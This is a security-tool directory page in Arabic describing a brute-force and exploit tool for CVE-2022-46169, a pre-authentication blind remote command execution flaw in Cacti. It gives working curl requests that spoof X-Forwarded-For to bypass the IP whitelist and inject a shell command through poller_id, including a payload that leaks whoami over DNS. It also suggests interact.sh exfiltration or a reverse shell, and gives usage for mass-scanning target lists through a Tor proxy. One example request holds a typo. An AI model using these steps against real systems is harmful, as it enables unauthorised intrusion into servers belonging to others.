Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-46169 — CVE-2022-46169 - Cacti تنفيذ التعليمات البرمجية عن بُعد الأعمى (قبل المصادقة) | Kitploit
أدوات/GitHubGitHub/taythebot/cve-2022-46169
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubtaythebot/cve-2022-46169

CVE-2022-46169

CVE-2022-46169 - Cacti تنفيذ التعليمات البرمجية عن بُعد الأعمى (قبل المصادقة)

عرض المستودع
12منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-46169

Cacti تنفيذ التعليمات البرمجية عن بُعد العمياء (قبل المصادقة)

إخلاء مسؤولية

هذا للأغراض التعليمية فقط. لست مسؤولاً عن أفعالك. استخدمه على مسؤوليتك الخاصة.

شرح

يقوم هذا البرنامج النصي بتجربة القيم بالقوة الغاشمة للمتغيرات المطلوبة لاستغلال هذه الثغرة. يتطلب هذا الاستغلال المتغيرات الثلاثة التالية:

  • عنوان IP المدرج في القائمة البيضاء
  • معامل host_id الصحيح
  • معامل local_data_ids الصحيح

الملف remote_agent.php محمي بقائمة بيضاء لعناوين IP. يمكنك تجاوز ذلك بانتحال عنوان IP الخاص بك في ترويسة X-Forwarded-IP. معظم النسخ ستكون لديها 127.0.0.1 أو عنوان IP الخاص بالخادم في القائمة البيضاء.

بعد ذلك، تحتاج إلى تجربة القيم بالقوة الغاشمة لمعاملات الطلب host_id و local_data_ids. يتم ذلك عن طريق تعداد أزواج الأعداد الصحيحة من قيمة أدنى افتراضية تساوي 1 وقيمة أعلى تساوي 10.

x,y

مثال على طلب

root@kitploit:~
pair_x="1"
pair_y="2"
curl -k -H "X-Forwarded-For: 127.0.0.1" \
    "https://target.com/cacti/remote_agent.php?action=polldata&poller_id=1&host_id=$pari_x&=local_data_ids[]=$pair_y"

[]

استغلال

بعد الحصول على هذه المتغيرات الثلاثة، يمكنك حقن أمر شيل في المفتاح poller_id وإفلاته بوضع ; قبل الأمر.

هذا تنفيذ أوامر عن بُعد أعمى، لذا تحتاج إلى إرسال مخرجات الأمر إلى مكان مثل interact.sh أو فتح شيل عكسي. تذكر ترميز قيمة poller_id بتشفير URL!

ينفذ التالي الأمر ping $(whoami).test.com

root@kitploit:~
curl -k -H "X-Forwarded-For: 127.0.0.01" \
    "https://target.com/cacti/remote_agent.php?action=polldata&host_id=1&local_data_ids[]=3&poller_id=;ping%20%24%28whoami%29.test.com"

المخرجات

يخرج البرنامج النصي بتنسيق CSV. الرؤوس هي "target", "ip", "host_id", "data_id", "url".

إذا كانت قيمة url مفقودة، فهذا يعني أن البرنامج النصي تمكن من تجاوز تقييد IP لكنه لم يتمكن من تجربة القيم بنجاح للمعرفات. يمكنك أخذ هذا المخرجات وتعيين قيمة أعلى قصوى للمحاولة مرة أخرى.

تحليل المخرجات

يمكنك استخدام الأوامر التالية لتحليل ملف المخرجات بسرعة

الأهداف التي تم تجاوز تقييد IP لها

root@kitploit:~
tail -n +2 results.csv | cut -d ',' -f1 | sort -u

الأهداف القابلة للاستغلال

root@kitploit:~
tail -n +2 results.csv | cut -d ',' -f5 | sort -u 

بناء

root@kitploit:~
go build -v -o bruteforce bruteforce.go

الاستخدام

root@kitploit:~
./bruteforce -l targets.txt -t 50 -min 1 -max 10
  • يجب أن تكون الأهداف قائمة بعناوين IP، يمكن حذف المنفذ
  • يتم دعم بروكسي Socks5 -proxy socks5://127.0.0.1:9050
  • ملف المخرجات الافتراضي هو results.csv
تنزيل الأداة